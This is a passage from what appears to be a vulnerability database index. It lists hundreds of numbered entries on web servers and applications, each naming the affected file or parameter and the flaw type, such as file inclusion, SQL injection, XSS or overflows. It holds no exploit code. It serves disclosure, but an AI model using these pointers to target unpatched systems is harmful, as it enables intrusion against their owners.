Webmedia Explorer templates/folder_messages_link_message_name.tpl.php path_template Parameter Remote File Inclusion [43141] Webmedia Explorer templates/main.tpl.php path_template Parameter Remote File Inclusion [43140] Webmedia Explorer includes/rss.class.php path_include Parameter Remote File Inclusion [43038] D-Bus dbus-daemon send_interface Local Security Policy Bypass [43025] ZyXEL P-2602HW-D1A Router Forms/RemMagWWW_1 WWWAccessInterface Parameter CSRF [43024] Cisco Linksys WRT54G Router FTP Interface Username / Password Remote DoS [43019] D-Link DSL-G604T Router cgi-bin/webcm var:category Parameter XSS [42997] Adobe ColdFusion Admin Interface Failed Login Logging Weakness [42981] SurgeMail webmail.exe page Variable Remote Format String [42939] Philips VOIP841 Default Install Web Console Admin Password [42929] WebcamXP Multiple Script Array Index Error Remote DoS [42928] WebcamXP /show_gallery_pic id Variable Arbitrary Memory Disclosure [42927] WebcamXP /pocketpc camnum Variable Arbitrary Memory Disclosure [42905] IEA Multiple Products Management Web Server Remote Memory Corruption [42888] Website META Language (WML) wml_backend/p1_ipp/ipp.src ipp.$$.tmp Symlink Arbitrary File Overwrite [42887] Website META Language (WML) wml_backend/p3_eperl/eperl_sys.c Temp Files Symlink Arbitrary File Overwrite [42886] Website META Language (WML) wml_contrib/wmg.cgi /tmp/pe.tmp.$$ Symlink Arbitrary File Overwrite [42881] IBM WebSphere Application Server (WAS) startserver.log Unspecified Cleartext Information Disclosure (PK53198) [42880] IBM WebSphere Application Server (WAS) trace Unspecified Information Disclosure [42879] IBM WebSphere Application Server (WAS) Monitor Role Users Unspecified Issue [42878] IBM WebSphere Application Server (WAS) http_plugin.log Unspecified Cleartext Information Disclosure (PK48785) [42869] Documentum Administrator / Webtop dmclTrace.jsp filename Variable Unrestricted Upload Arbitrary File Overwrite [42864] Skype Internet Explorer Web Control Video Gallery Metacafe Movie Title Cross-zone Scripting [42863] Skype Internet Explorer Web Control Dailymotion Title Field Cross-zone Scripting [42826] BitTorrent Web UI HTTP Request Range Header Processing DoS [42825] uTorrent Web UI HTTP Request Range Header Processing Overflow [42796] Neptune Web Server 404 Error Page XSS [42781] MiniWeb HTTP Server http.c mwGetLocalFileName Function Encoded Traversal Arbitrary File/Directory Access [42780] MiniWeb HTTP Server http.c _mwProcessReadSocket Function URI Handling Remote Overflow [42737] WebCT Campus Edition Discussion Board Message XSS [42736] WebCT Campus Edition Mail Message XSS [42720] Eye-Fi Web Server Crafted WS-Proxy Request Remote DoS [42712] Microsoft Office Web Components DataSource Page Handling Arbitrary Code Execution [42711] Microsoft Office Web Components URL Parsing Arbitrary Code Execution [42703] Sun Java Web Console Remote File Existence Enumeration [42687] MyABraCaDaWeb header.php ma_kw Parameter XSS [42679] Falcon Web Server URI Multiple Error Message XSS [42674] PHP Webquest admin/backup_phpwebquest.php Direct Request Database Credentials Disclosure [42632] WebGUI Secondary Admin Privilege Escalation [42626] BarracudaDrive Web Server Crafted Request Script Source Disclosure [42625] BarracudaDrive Web Server Gropu Chat /eh/chat.ehintf/C. Remote DoS [42624] BarracudaDrive Web Server URI Path Trace Page XSS [42623] BarracudaDrive Web Server /drive/c/bdusers/USER/ dir Variable Traversal Arbitrary File Manipulation [42622] BarracudaDrive Web Server URL Path Traversal Arbitrary File Access [42616] Ruby WEBrick WEBrick::HTTPServ :NondisclosureName Option Mixed Case Arbitrary File Access [42615] Ruby WEBrick WEBrick::HTTPServ* Encoded Traversal Arbitrary File Access [42606] WebContent M1 redirect.do sid Parameter XSS [42602] Sun Java Web Start Application JNLP File Handling Overflow (6660121) [42596] Sun Java Web Start Untrusted Application Unspecified Privilege Escalation (6611594) [42595] Sun Java Web Start Untrusted Application Unspecified Privilege Escalation (6623233) [42594] Sun Java Web Start useEncodingDecl() Function XML Header Parsing Overflow [42593] Sun Java Web Start Unspecified Application Handling Overflow (6605187) [42592] Sun Java Web Start Unspecified Application Handling Overflow (6605184) [42585] Easy File Sharing Web Server Crafted User Name File Content Disclosure [42584] Easy File Sharing Web Server Direct Request .sdb Database File Disclosure [42583] Easy File Sharing Web Server Traversal Arbitrary File Upload [42547] Portail Web Php template/Bleu/index.php site_path Parameter Remote File Inclusion [42546] Portail Web Php template/Noir/index.php site_path Parameter Remote File Inclusion [42545] Portail Web Php template/Vert/index.php site_path Parameter Remote File Inclusion [42543] PHP-Nuke modules/Web_Links/index.php lid Parameter SQL Injection [42528] Ripe Website Manager admin/pages/do_new_page.php Multiple Parameter SQL Injection [42527] Ripe Website Manager admin/navigation/do_new_nav.php new_menuname Parameter SQL Injection [42526] Ripe Website Manager admin/navigation/do_new_item.php Multiple Parameter SQL Injection [42525] Ripe Website Manager navigation/delete_item.php id Parameter SQL Injection [42524] Ripe Website Manager navigation/delete_menu.php id Parameter SQL Injection [42523] Ripe Website Manager pages/delete_page.php id Parameter SQL Injection [42497] Jetty Dump Servlet (webapps/test/jsp/dump.jsp) Unspecified XSS [42448] ZyXEL ZyWALL 2 ZyNOS Management Interface Invalid Config Data Infinite Reboot Remote DoS [42421] Acunetix Web Vulnerability Scanner White Space URL Arbitrary Program Execution [42362] IBM WebSphere SVRCONN MQ Client Queue Manager Security Bypass [42345] BEA WebLogic WSDL / Security Policy Unspecified Remote Disclosure [42314] Bajie Http Web Server Query String XSS [42289] Rising Online Virus Scanner Rising Web Scan Object ActiveX (OL2005.dll) UpdateEngine() Method Arbitrary File Download [42267] IBM Lotus Domino Web Access Unspecified Remote Issue [42249] Web_Links Module for PHP-Nuke module.php cid Parameter SQL Injection [42215] Aeries Browser Interface GradebookStuScores.asp GrdBk Parameter SQL Injection [42209] Porar Webboard question.asp QID Parameter SQL Injection [42120] Kerio MailServer WebMail Arbitrary Meeting Manipulation [42116] Aeries Browser Interface ClassList.asp Term Parameter SQL Injection [42115] Aeries Browser Interface Labels.asp Term Parameter SQL Injection [42114] Aeries Browser Interface Comments.asp FC Parameter SQL Injection [42113] Aeries Browser Interface title Field XSS [42104] MyWebFTP pass/pass.txt Direct Request Remote Ciphertext Password Disclosure [42032] Progress Webspeed OpenEdge Messenger _cpyfile.p Arbitrary Command Execution [42027] Hitachi Web Server Server-status Page Creation Unspecified XSS [42026] Hitachi Web Server SSL Client Certification Validation Weakness [41901] BEA WebLogic Administrator Console /console/login/LoginForm.jsp Session Fixation [41900] BEA WebLogic Account Lockout Bypass Brute Force Weakness [41899] BEA WebLogic Multiple Unspecified XSS [41898] BEA WebLogic Proxy Servlet Request Unspecified Privilege Escalation [41897] BEA WebLogic Crafted URL Unspecified Remote DoS [41896] BEA WebLogic Portal Entitlement Policy Failure [41895] BEA WebLogic JMS Topic Destination Security Policy Bypass [41894] BEA WebLogic Protected Distributed Queue Message Sending [41893] BEA WebLogic Console\x92s Unexpected Exception Page XSS [41892] BEA WebLogic config.xml Cleartext Database Password Disclosure [41891] BEA WebLogic Apache Beehive NetUI Page Flow Unspecified XSS [41890] BEA WebLogic Workshop NetUI Page Flow Unspecified XSS [41889] BEA WebLogic Portal Administration Console HTTP Session Downgrade [41888] BEA WebLogic Request Header Manipulation Unspecified Privilege Escalation [41887] BEA WebLogic Portal Page Editing Operations Unspecified Security Policy Failure [41886] BEA WebLogic Portal Floatable Portlet Instance Entitlement Bypass [41885] BEA WebLogic Workshop NetUI Page Flows Unspecified XSS [41884] BEA WebLogic Portal WLP Groupspace Unspecified XSS [41883] WebGUI New User Creation Username XSS [41880] BEA WebLogic Mobility Server Image Converter Unspecified Resource Access [41873] Macrovision FLEXnet Connect MVSNCLientWebAgent61.WebAgent ActiveX (isusweb.dll) DownloadAndExecute Method Arbitrary Code Execution [41871] Mono on Windows System.Web StaticFileHandler.cs Crafted Request Source Code Disclosure [41867] LiteSpeed Web Server MIME Type Injection Null Byte Script Source Code Disclosure [41850] MPCSoftWeb Photo mpcsoftweb_photo.mdb Direct Request Database Disclosure [41801] artmedic webdesign weblog artmedic_print.php date Parameter Traversal Arbitrary File Access [41800] artmedic webdesign weblog index.php ta Parameter Traversal Arbitrary File Access [41791] ATutor User Profile Website Field XSS [41766] eXtremail Admin Interface LOGIN Command Remote Overflow [41760] XPWeb Download.php url Parameter Arbitrary File Access [41731] Archangel Weblog index.php index Parameter Traversal Arbitrary File Access [41688] IBM WebSphere Application Server (WAS) Administrative Console Unspecified Issue [41673] Gallery WebDAV Module PROPPATCH Method XSS [41663] Gallery WebDAV Module View Unspecified Issue [41659] Gallery WebCam Module Proxied Request Unspecified Issue [41657] Gallery WebDAV Module Unspecified File Manipulation [41653] Gateway Weblaunch weblaunch.ocx WebLaunch.WeblaunchCtl DoWebLaunch Method Traversal Arbitrary Program Execution [41652] Gateway Weblaunch weblaunch.ocx WebLaunch.WeblaunchCtl DoWebLaunch Method Overflow Arbitrary Code Execution [41649] TYPOlight webCMS preview.php src Variable Arbitrary File Download [41646] IBM WebSphere Application Server (WAS) http_plugin.log Unspecified Cleartext Information Disclosure (PK45768\|PK52709) [41645] IBM WebSphere Application Server (WAS) PropFilePasswordEncoder Utility Unspecified Issue [41644] IBM WebSphere Application Server (WAS) Web Container Cross-Request Information Disclosure [41638] The Dawn of Time websrv.cpp HTTP Server Multiple Authentication Field Remote Format String [41627] IBM WebSphere Business Modeler Unspecified Repository Restriction Bypass [41619] IBM WebSphere uddigui/navigateTree.do Multiple Parameter CSRF [41618] IBM WebSphere uddigui/navigateTree.do Multiple Parameter XSS [41617] IBM WebSphere Application Server (WAS) Edge Component Unspecified Issue (PK44789) [41616] IBM WebSphere Application Server (WAS) Default Messaging Component SSL Client Race Condition Overflow [41615] IBM WebSphere Application Server (WAS) Unspecified Issue (PK33799) [41614] IBM WebSphere Application Server (WAS) Default Messaging Component Unspecified Remote DoS [41613] IBM WebSphere Application Server (WAS) Default Messaging Component Unspecified Issue [41612] IBM WebSphere Application Server (WAS) Samples Component Unspecified XSS [41611] IBM WebSphere Application Server (WAS) PD Tools Component Unspecified Issue (PK33803) [41609] IBM WebSphere Application Server (WAS) Specific JSP URL Information Disclosure (PK20181) [41608] IBM WebSphere Application Server (WAS) Special URI Unspecified Information Disclosure [41607] IBM WebSphere Application Server (WAS) Unspecified Exposure (PK26123) [41606] IBM WebSphere Application Server (WAS) SimpleFileServlet Crafted Request Information Disclosure [41605] IBM WebSphere Application Server (WAS) Servlet Engine/Web Container Unspecified Issue [41604] IBM WebSphere Application Server (WAS) Java Message Service (JMS) Unspecified Remote DoS [41603] IBM WebSphere Application Server (WAS) fileServingEnabled Functionality JSP Source Disclosure (PK32374) [41602] IBM WebSphere Application Server (WAS) SWAM Transformation Code security.xml Overwrite Weakness [41600] IBM WebSphere Application Server (WAS) Security Bindings Validation Failure [41580] phpWebFileManager plugins/file.php fm_path Parameter Traversal Arbitrary File Access [41532] artmedic weblog index.php jahrneu Parameter XSS [41531] artmedic weblog artmedic_print.php date Parameter XSS [41472] Portail Web Php system/login.php site_path Parameter Remote File Inclusion [41471] Portail Web Php modules/conf_modules.php site_path Parameter Remote File Inclusion [41470] Portail Web Php menu/item.php site_path Parameter Remote File Inclusion [41469] Portail Web Php config/conf-activation.php site_path Parameter Remote File Inclusion [41468] Microsoft FoxPro ActiveX Web Page Parsing Unspecified Memory Corruption [41460] Microsoft WebDAV Mini-Redirector Response Handling Arbitrary Code Execution [41445] Microsoft IIS ASP Web Page Input Unspecified Arbitrary Code Execution [41389] FSD servinterface.cc servinterface::sendmulticast Function PIcallsign Command Remote Overflow [41369] CA BrightStor ARCServe Backup Message Engine (mediasvr.exe) RPC Interface 0x10d opnum Remote Overflow [41285] IBM WebSphere Edge Server Caching Proxy Error Page XSS [41276] WebCalendar search.php adv Parameter XSS [41275] WebCalendar pref.php Query String XSS [41274] WebCalendar Event Description XSS [41168] Sejoong Namo ActiveSquare6 Namo Web Editor NamoInstaller.NamoInstall ActiveX (NamoInstaller.dll) Install Method Arbitrary Code Execution [41128] Mindmeld acweb/admin_index.php MM_GLOBALS[home] Parameter Remote File Inclusion [41117] Webmin/Usermin webmin_search.cgi search Parameter XSS [41104] Webmatic Unspecified SQL Injection [41102] VHD Web Pack index.php page Parameter Local File Inclusion [41091] Microsoft IIS webhits.dll Hit-Highlighting Authentication Bypass [41087] Open WebMail (OWM) openwebmail-abook.pl Multiple Parameter XSS [41086] Open WebMail (OWM) openwebmail-advsearch.pl folder Parameter XSS [41085] Open WebMail (OWM) openwebmail-webdisk.pl Multiple Parameter XSS [41084] Open WebMail (OWM) openwebmail-folder.pl Multiple Parameter XSS [41083] Open WebMail (OWM) openwebmail-send.pl Multiple Parameter XSS [41082] Open WebMail (OWM) openwebmail-prefs.pl Multiple Parameter XSS [41081] Open WebMail (OWM) openwebmail-main.pl Multiple Parameter XSS [41066] Proverbs Web Calendar caladmin.inc.php Multiple Parameter SQL Injection [41028] Web Oddity URI Traversal Arbitrary File Access [40968] Sun Java System Web Proxy Server Unspecified FTP Request Handling DoS [40967] Sun Java System Web Proxy Server virt-map Directive Malformed host-regex Argument Remote DoS [40966] Sun Java System Web Proxy Server sockd Daemon Domain Name Address Type Handling Overflow [40965] Sun Java System Web Proxy Server sockd Daemon s5auth_userpass() Function Overflow [40964] Sun Java System Web Proxy Server Malformed Cache-control Header DoS [40955] 360 Web Manager form.php IDFM Parameter SQL Injection [40954] IBM Lotus Domino Web Access Upload Module (dwa7w.dll) Multiple ActiveX General_ServerName Property Overflow [40932] Foojan WMS PHP Weblog index.php story Parameter SQL Injection [40920] Web Wiz Rich Text Editor RTE_popup_save_file.asp Unspecified Remote File Upload [40890] HP Virtual Rooms Install WebHPVCInstall.HPVirtualRooms14 ActiveX (HPVirtualRooms14.dll) Multiple Property Overflow [40881] DVRHOST Web CMS OCX PdvrAtl.PdvrOcx ActiveX (PDVRATL.DLL) TimeSpanFormat() Method Overflow [40851] Sun Java System Web Proxy Server View URL Database Functionality Unspecified XSS [40850] Sun Java System Web Proxy Server Unspecified XSS (6566204) [40849] Sun Java System Web Proxy Server Unspecified XSS (6611356) [40848] Sun Java System Web Proxy Server View Error Log Functionality XSS [40847] Tripwire Enterprise Web Management Login Page XSS [40825] webSPELL admin/admincenter.php CSRF [40824] webSPELL index.php sort Parameter XSS [40817] Solaris Volume Manager (SVM) ioctl Interface Unspecified Local DoS [40809] IBM WebSphere Application Server (WAS) Utility Classes Unspecified Security Issue [40772] Webmin Crafted URL Unspecified Arbitrary Command Execution [40771] British Telecommunications Business Connect webhelper btwebcontrol.dll ActiveX Multiple Unspecified Overflows [40769] Yamaha RT Series Routers Multiple Management Interface CSRF [40741] webdesproxy webdesproxy.c process_connection_request Function Overflow Remote Code Execution [40723] Apple Multiple Products WebKit Page Subframe Navigation XSS [40688] Apple Mac OS X WebKit Safari PDF Preview Temp File Information Disclosure [40687] Apple Mac OS X WebKit Safari Indirect Proxy TCP Traffic Manipulation [40667] Apple Mac OS X WebCore File Upload Unspecified Remote Form Field Manipulation [40666] Apple Mac OS X WebCore Safari Page Transition Third Party Site Form Information Disclosure [40665] Apple Mac OS X WebCore Browser History Memory Corruption Unspecified Code Execution [40623] The Online Web Library Site src/scripture.php pageHeaderFile Parameter Remote File Inclusion [40595] Xitami Web Server xitami.exe If-Modified-Since Header Remote Overflow [40594] Xitami Web Server xigui32.exe If-Modified-Since Header Remote Overflow [40581] Open WebMail (OWM) Multiple Unspecified XSS [40515] IBM WebSphere Application Server (WAS) serveServletsByClassnameEnabled Unspecified Issue [40514] OKI C5510MFP Printer Configuration Interface Password Disclosure [40488] Web Wiz NewsPad RTE_file_browser.asp sub Parameter Traversal Arbitrary File Access [40487] Web Wiz Rich Text Editor RTE_file_browser.asp sub Parameter Traversal Arbitrary File Access [40485] Web Wiz Forums file_browser.asp sub Parameter Traversal Arbitrary File Access [40484] Web Wiz Forums RTE_file_browser.asp sub Parameter Traversal Arbitrary File Access [40444] MailBee WebMail Pro File download_view_attachment.aspx temp_filename Parameter Traversal Arbitrary File Access [40430] IBM AIX sysmgt.websm.webaccess WebSM Remote Client Files Unspecified Permission Weakness [40408] Small Axe Weblog linkbar.php Multiple Parameter Remote File Inclusion [40383] PHP Webquest soporte_horizontal_w.php id_actividad Parameter SQL Injection [40354] MailEnable Professional Web Administration Cleartext User Password Disclosure [40291] Site2Nite Real Estate Web default.asp Multiple Parameter SQL Injection [40272] FreeWebshop index.php Multiple Parameter SQL Injection [40265] WebPortal CMS actions.php lostpass Action Remote Arbitrary Account Access [40251] SurgeMail Webmail Host Header Handling Remote DoS [40240] iMesh IMWeb.IMWebControl ActiveX (IMWeb.dll) ProcessRequestEx Method Empty String DoS [40239] iMesh IMWeb.IMWebControl ActiveX (IMWeb.dll) SetHandler Method Arbitrary Code Execution [40231] Novell NetWare Enterprise Web Server webacc Servlet error Variable Remote HTT File Access [40226] samPHPweb songinfo.php songid Parameter SQL Injection [40215] WebPortal CMS actions.php user_name Parameter SQL Injection [40201] Uebimiau Webmail error.php selected_theme Parameter Arbitrary File Access [40169] IBM WebSphere Application Server (WAS) Administrative Scripting Tools Unspecified Security Bypass [40157] WebEvent webevent.pl cmd Parameter XSS [40156] WebEvent webevent.cgi cmd Parameter XSS [40137] NetAlert Web Filter Unspecified Local Bypass [40039] Oracle Database Help for Web HTTP Unspecified Remote Issue [40022] Oracle E-Business Suite Self-Service Web Applications HTTP Unspecified Issue [39992] Oracle Database Progam Interface Unspecified Remote DoS [39980] Macrovision InstallShield Update Service Web Agent ActiveX DownloadAndExecute Method Arbitrary Code Execution [39947] Oracle E-Business Suite iProcurement Self Service Web User Remote Information Disclosure [39917] samPHPweb Template for SAM Broadcaster common/db.php commonpath Parameter Remote File Inclusion [39900] Microsoft Web Proxy Auto-Discovery (WPAD) Crafted DNS MitM Weakness [39887] WebPortal CMS index.php m Parameter SQL Injection [39878] AGENCY4NET WEBFTP download2.php file Parameter Traversal Arbitrary File Access [39797] Search Module for phpWebSite index.php search Parameter XSS [39746] activeWeb contentserver Restricted Account Arbitrary File Creation [39745] activeWeb contentserver WYSIWYG Editor admin/worklist/worklist_edit.asp Applet Tag Filter Bypass [39720] IBM Lotus Domino Web Server Unspecified XSS [39699] WebED mod/chat/index.php Multiple Parameter Traversal Arbitrary File Access [39697] Web-MeetMe play.php Multiple Parameter Traversal Arbitrary File Access [39640] Web Sihirbazi default.asp Multiple Parameter SQL Injection [39612] Unreal Engine Internal Web Server Logging Function Overflow Remote DoS [39547] Diskeeper Administrative Interface (DkService.exe) RPC Request Remote DoS [39546] Diskeeper Administrative Interface (DkService.exe) RPC Request Remote Information Disclosure [39532] HP OpenView Network Node Manager (OV NNM) webappmon.exe Remote Overflow [39517] Ganglia web/get_context.php Multiple Parameter XSS [39516] Ganglia web/graph.php Multiple Parameter XSS [39515] Ganglia web/host_gmetrics.php Multiple Parameter XSS [39383] Aeries Browser Interface (ABI) LostPwd.asp EmailAddress Parameter SQL Injection [39380] Stampit Web SOAP Request Stamp Invalidation Remote DoS [39297] P4Web P4Webs.exe HTTP Request CPU Consumption Remote DoS [39278] WorkingOnWeb events.php idevent Parameter SQL Injection [39272] Multiple Web Server favicon.ico Vendor Fingerprinting [39258] IBM Lotus Sametime WebRunMenuFrame Page URI XSS [39233] Linux Kernel Philips USB Webcam (pwc) Driver Disconnect Method Local DoS [39232] Google Web Toolkit (GWT) Benchmark Reporting System Unspecified XSS [39220] SERweb js/get_js.php Multiple Parameter Traversal Arbitrary File Access [39219] SERweb load_phplib.php _PHPLIB[libdir] Parameter Remote File Inclusion [39218] SERweb main_prepend.php _SERWEB[functionsdir] Parameter Remote File Inclusion [39217] SERweb load_lang.php _SERWEB[configdir] Parameter Remote File Inclusion [39216] WebEvent webevent.cgi cmd Parameter XSS [39196] WikiWebWeaver index.php Multiple File Extension Upload Arbitrary Code Execution [39187] Planet VC-200M VDSL2 Administration Interface Null HOST Header Remote DoS [39169] webSPELL calendar.php Multiple Parameter XSS [39168] webSPELL usergallery.php galleryID Parameter XSS [39155] Websense Web Reporting Tools Websense/cgi-bin/WsCgiLogin.exe username Parameter XSS [39152] Websense Crafted User-Agent Fields HTTP Headers Filter Bypass [39139] Mcms Easy Web Make modules/cms/index.php template Parameter Traversal Local File Inclusion [39034] phpWebFileManager index.php PN_PathPrefix Parameter Remote File Inclusion [39010] LiteWEB Nonexistent Page Saturation Request Remote DoS [38995] Webbler index.php HTML Comment Path Disclosure [38994] Webbler CMS mail a friend Form Forged Mail Relay [38915] PHP_CON include.php webappcfg[APPPATH] Parameter Remote File Inclusion [38898] DeskPRO admincp/ticket_rules_web.php Unspecified Parameter XSS [38886] WBR3404TX Broadband Router Web Management Panel cgi-bin/ddns Multiple Parameter XSS [38874] FileMaker Instant Web Publishing Unspecified XSS [38805] Buttercup Web File Manager index.php title Parameter XSS [38803] eSellerate SDK ActiveX (eSellerateControl365.dll) GetWebStoreURL Function Arbitrary Code Execution [38708] VTLS Web Gateway vtls.web.gateway searchtype Parameter XSS [38700] IBM WebSphere Application Server (WAS) WebContainer Expect HTTP Header XSS [38691] ADempiere Bazaar WebUI Unspecified Authentication Bypass [38690] Advanced Webhost Billing System (AWBS) Unspecified Configuration Information Disclosure [38673] Apache Jakarta Slide WebDAV SYSTEM Request Traversal Arbitrary File Access [38604] Novell GroupWise WebAccess webacc Servlet User.Id Parameter XSS [38595] TeamSpeak WebServer login.tscmd Crafted HTTP Post Request Resource Consumption DoS [38580] Cart32 c32web.exe ImageName Traversal Arbitrary File Access [38575] guanxiCRM Business Solution rfc822.php webmail2_inc_dir Parameter Remote File Inclusion [38519] BEA WebLogic Server SSL Server Cipher Selection Fallback Weakness [38518] BEA WebLogic Server Gold Unspecified Server Thread Remote DoS [38517] BEA WebLogic Server Gold Malformed HTTP Header Disk Consumption Remote DoS [38516] BEA WebLogic Portal Entitlements Clustered Servers Policy Restriction Bypass [38514] BEA WebLogic Server Malformed HTTP Request Proceeding Request Information Disclosure [38513] BEA WebLogic Server Proxy Plug-in for Apache Protocol Error Handling Remote DoS [38512] BEA WebLogic Server EJB Methods Remote Privilege Escalation [38511] BEA WebLogic Server Compatibility Realm EJB Container Persistence Privileged Operation Execution [38510] BEA WebLogic Server WSEE (WS-Security Runtime) Client Message Decryption Weakness Application Security Bypass [38509] BEA WebLogic Server Exploded jar Dynamic Update Access Restriction Bypass [38506] BEA WebLogic Server muxer Thread Error Page Remote DoS [38505] BEA WebLogic Server .ear File Class-path Property Arbitrary File Disclosure [38504] BEA WebLogic Server config.xml Backup Cleartext Information Disclosure [38503] BEA WebLogic Server WS-Security Certificate Validation MiTM Weakness [38502] BEA WebLogic Thread Management T3 Authentication Unspecified Remote DoS [38501] BEA WebLogic JDBCDataSourceFactory MBean Properties Cleartext Password Local Disclosure [38500] BEA WebLogic Server Cached Connection X.509 Certificate Validation Bypass [38494] Microsoft Windows Graphics Device Interface (GDI+, GdiPlus.dll) ICO Handling DoS [38474] xunlei Web Thunderbolt ThunderServer.webThunder ActiveX Arbitrary File Download [38468] IBM WebSphere Application Server (WAS) Samples Component Unspecified XSS [38449] Ripe Website Manager admin/pages/do_new_page.php Multiple Parameter XSS [38448] Ripe Website Manager admin/navigation/do_new_nav.php new_menuname Parameter XSS [38447] Ripe Website Manager admin/navigation/do_new_item.php Multiple Parameter XSS [38446] Ripe Website Manager navigation/delete_item.php id Parameter XSS [38445] Ripe Website Manager navigation/delete_menu.php id Parameter XSS [38444] Ripe Website Manager pages/delete_page.php id Parameter XSS [38442] WordPress / MU wp-newblog.php weblog_id Parameter XSS [38428] Cisco Unified Meeting Place mpweb/scripts/mpx.dll Multiple Parameter XSS [38425] Weblogicnet es_offer.php files_dir Parameter Remote File Inclusion [38424] Weblogicnet es_custom_menu.php files_dir Parameter Remote File Inclusion [38423] Weblogicnet es_desp.php files_dir Parameter Remote File Inclusion [38398] ED Engine WebED viewitem.php Codebase Parameter Remote File Inclusion [38397] ED Engine WebED view.php Codebase Parameter Remote File Inclusion [38396] ED Engine WebED post.php Codebase Parameter Remote File Inclusion [38395] ED Engine WebED channeledit.php Codebase Parameter Remote File Inclusion [38361] Comdev Web Blogger sampleblogger.php path[docroot] Parameter Remote File Inclusion [38349] Zindizayn Okul Web Sistemi ogretmenkontrol.asp Multiple Parameter SQL Injection [38348] Zindizayn Okul Web Sistemi mezungiris.asp Multiple Parameter SQL Injection [38347] Macrovision Update Service ActiveX (isusweb.dll) Unspecified Arbitrary Code Execution [38337] Uebimiau Webmail demo/pop3/error.php Multiple Variable Path Disclosure [38324] NEC MultiWriter 1700C Web Server Unspecified Configuration Modification [38310] lighttpd mod_webdav Debug Message Format Specifier Unspecified DoS [38297] Sun Java Web Start JRE ActiveX (isInstalled.dnsResolve) dnsResolve Method Overflow [38286] WebBatch webbatch.exe dumpinputdata Variable Remote Information Disclosure [38285] WebBatch webbatch.exe URL XSS [38282] GOM Player GomWebCtrl.GomManager.1 ActiveX (GomWeb3.dll) OpenURL() Method Arbitrary Code Execution [38256] gnuedu web/lom.php ETCDIR Parameter Remote File Inclusion [38255] gnuedu web/login.php LIBSDIR Parameter Remote File Inclusion [38254] gnuedu web/index.php LIBSDIR Parameter Remote File Inclusion [38253] gnuedu web/help.php LIBSDIR Parameter Remote File Inclusion [38252] gnuedu web/logout.php LIBSDIR Parameter Remote File Inclusion [38235] WebcamXP Unspecified Parameter XSS [38221] Yahoo! Messenger Kakadu (kdu_v32m.dll) Webcam JPEG 2000 Data Handling Overflow [38187] Apache Geronimo / Tomcat WebDAV XML SYSTEM Tag Arbitrary File Access [38182] MailMarshal Spam Quarantine Interface UserID Variable SQL Truncation Arbitrary Account Modification [38181] WebCit Unspecified CSRF [38180] WebCit Uploaded File Name XSS [38179] WebCit Room Name XSS [38178] WebCit Bulletin Board Mode XSS [38177] WebCit Calendar Mode Unspecified XSS [38176] WebCit showuser who Parameter XSS [38169] Aleris Web Publishing Server calendar/page.asp mode Parameter SQL Injection [38156] Barracuda Spam Firewall Monitor Web Syslog username Field XSS [38135] WebIf /cgi-bin/webif.exe cmd Parameter XSS [38095] SAP NetWeaver Web Application Server Internet Communication Manager Crafted URI Remote DoS [38050] Webavis class/class.php root Parameter Remote File Inclusion [37997] Omnivista 4760 php-bin/Webclient.php Multiple Parameter XSS [37961] WS_FTP Administration Interface Valid Command Argument XSS [37922] vDesk Webmail printcal.pl type Parameter XSS [37911] NetWin SurgeFTP Mirrored Management Interface Malformed Response XSS [37904] Weblinks Module for Drupal Unspecified Parameter XSS [37882] WebDesktop wsk/wsk.php wsk Parameter Remote File Inclusion [37881] WebDesktop apps/apps.php app Parameter Remote File Inclusion [37841] Citrix Access Gateway Web-based Administration Console Unspecified CSRF [37838] SAP DB Web Server (waHTTP.exe) sapdbwa_GetQueryString Overflow [37833] WebMod auth.w redir Parameter XSS [37801] Ripe Website Manager includes/phpinfo.php Information Disclosure [37800] Ripe Website Manager admin/includes/admin_header.php level Parameter Remote File Inclusion [37799] Ripe Website Manager admin/includes/author_panel_header.php level Parameter Remote File Inclusion [37777] Xunlei Web Thunder DapPlayer ActiveX (DapPlayer_Now.dll) DownURL2 Method Arbitrary Code Execution [37756] Sun Java Web Start javaws.exe JNLP File Processing codebase Attribute Overflow [37755] Sun Java Web Start PersistenceService Application Traversal Arbitrary File Overwrite [37753] Snom 320 SIP Phone Web Server Information Disclosure [37752] Snom 320 SIP Phone Web Server Proxy Call Redirect [37748] SAP Web Dynpro Java (BC-WD-JAV) User-Agent HTTP Header XSS [37737] jetAudio JetAudio.Interface.1 ActiveX (JetFlExt.dll) DownloadFromMusicStore Method Arbitrary File Overwrite [37713] Kaspersky Online Scanner kavwebscan.CKAVWebScan ActiveX (kavwebscan.dll) Format String Arbitrary Code Execution [37700] Clever Internet ActiveX Suite clInetSuiteX6.clWebDav ActiveX (CLINETSUITEX6.OCX) GetToFile Method Arbitrary File Overwrite [37693] DivX Web Player DivXBrowserPlugin ActiveX (npdivx32.dll) GoWindowed Method DoS [37669] ZyXEL ZyWALL 2 ZyNOS Management Interface Default Password [37651] DNews dnewsweb Multiple Parameter XSS [37650] MailBee WebMail default.asp mode2 Parameter XSS [37649] MailBee WebMail login.php mode Parameter XSS [37644] Check Point SofaWare Safe@Office Management Interface CSRF [37620] xKiosk WEB /system/funcs/xkurl.php PEARPATH Parameter Remote File Inclusion [37580] Acunetix Web Vulnerability Scanner (WVS) Invalid Content-Length HTTP Request DoS [37558] PHP-Ring Webring System index.php ring Parameter SQL Injection [37516] webSPELL index.php site Parameter Traversal Local File Inclusion [37508] WebIf webif.cgi outconfig Traversal Local File Inclusion [37504] Cisco Catalyst 6500 / 7600 Series EOBC Local Interface Weakness [37464] Uebimiau Webmail demo/pop3/error.php selected_theme Parameter XSS [37463] Uebimiau Webmail redirect.php PATH_INFO Parameter XSS [37460] Trionic Cite interface/editors/custom.php bField[bf_data] Parameter Remote File Inclusion [37459] Trionic Cite interface/editors/-custom.php bField[bf_data] Parameter Remote File Inclusion [37458] Web Templates Management System index.php id Parameter SQL Injection [37449] AlstraSoft Text Ads Enterprise website_page.php pageId Parameter XSS [37439] WebSlider include/modules.php path Parameter Remote File Inclusion [37438] WebSlider plugins/highlight.php path Parameter Remote File Inclusion [37437] WebSlider modules/pdf.php path Parameter Remote File Inclusion [37436] WebSlider index.php path Parameter Remote File Inclusion [37388] Http Explorer Web Server URI Traversal Arbitrary File Access [37334] Solaris Human Interface Device (HID) Unspecified Local DoS [37330] Webwiz Rich Text Editor JavaScript SRC XSS [37269] open-iscsi (iscsi-initiator-utils) iscsid usr/mgmt_ipc.c Mangement Interface Remote DoS [37257] Advanced Webhost Billing System (AWBS) Multiple Unspecified SQL [37253] MiniWebsvr Unspecified Sub-root Regression Issue [37248] Sun Java System Web / Application Server Crafted XSLT Stylesheet Arbitrary Java Method Execution [37230] Packeteer PacketShaper Web Management rpttop.htm Crafted Request Remote DoS [37217] Kaspersky 